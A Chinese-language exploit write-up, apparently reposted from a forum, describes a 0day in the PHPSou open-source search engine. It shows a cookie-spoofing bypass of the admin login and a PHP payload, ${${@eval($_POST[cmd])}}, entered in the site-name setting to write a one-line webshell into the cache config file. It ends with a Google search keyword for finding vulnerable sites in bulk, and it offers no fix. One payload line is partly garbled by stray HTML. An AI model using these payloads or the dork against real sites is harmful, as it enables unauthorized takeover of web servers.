转自互联网:http://www.baidu.com/s?wd=PHPSou%BF%AA%D4%B4%CB%D1%CB%F7%CF%B5%CD%B30Day

1 漏洞描述

PHPSou是一套开源搜索引擎系统,官方论坛为:www.phpsou.net,简单介绍如下:PHPSou垂直搜索引擎采用PHP+Mysql开发,是国内首款基于开源底层脚本语言开发的搜索引擎系统。我们在审核phpsou代码的时候,发现该系统存在非常危险的安全漏洞,利用者可以伪造信息登录后台并通过后台获取webshell。

cookies欺骗漏洞

/admin/index.php 等文件均包含验证文件


        <?php
        require "global.php";
        ?>


        Global.php代码如下:


        <?php
        if($_COOKIE["adminname"]=="")
        {
            header("location:login.php");
        }
        require ("../global.php");
        require ("global_function.php");
        $admin=$db->get_one("select * from ve123_admin where admin_id='1'");
        if($_COOKIE["adminname"]<>$admin["adminname"]){header("location:login.php");die();}
        $comurl=$_SERVER['HTTP_REFERER'];
        ?>


      后台仅用cookies做验证,adminname的值取数据中admin_id=1的管理员的用户名,如果验证通过,那么就可以成功利用cookies欺骗登录后台

PHPSou开源搜索系统0Day

      如果要通过cookies欺骗登录对方后台,我们仅仅需要知道对方的用户名即可,常用的用户名有:guigou,admin,$domain$(对方域名)等。

缓存文件写入shell漏洞

后台修改配置文件/admin/site_config.php

……略去部分代码


$fp=@fopen("../cache/site_config.php","w") or die("写方式打开文件失败,请检查程序目录是否为可写");//配置conn.php文件
@fputs($fp,$str) or die("文件写入失败,请检查程序目录是否为可写");
@fclose($fp);

后台的配置会写入到上级cache目录下的site_config.php,该文件内容如下:

<?php
$config['name']="PHP开源搜索";
$config['user_agent']="PhpSou";

由于系统过滤双引号,导致我们无法直接写入webshell,但是我们可以利用php的{}属性来功构造一个webshell。

首先通过cookies欺骗进入对方后台,然后在网站配置处修改“网站名称”如下:

PHP开源搜索POST[cmd" data-ke-src="mailto:${${@eval($_POST[cmd">${${@eval($_POST[cmd]}}

写入成功后,www.target.com/cache/site_config.php内容即插入一句话木马

<?php
$config['name']="PHP开源搜索${${eval($_POST[cmd])}}";

使用一句话木马客户端连接,即可获得网站权限。

PHPSou开源搜索系统0Day

3   批量获取权限谷歌构造关键词搜索

inurl:search/url_submit.php

说明:该漏洞存在与PhpSou_GBK1.0-1.1版,其他版本请自行测试,后台还有其他方法可以获取webshell,请自行测试。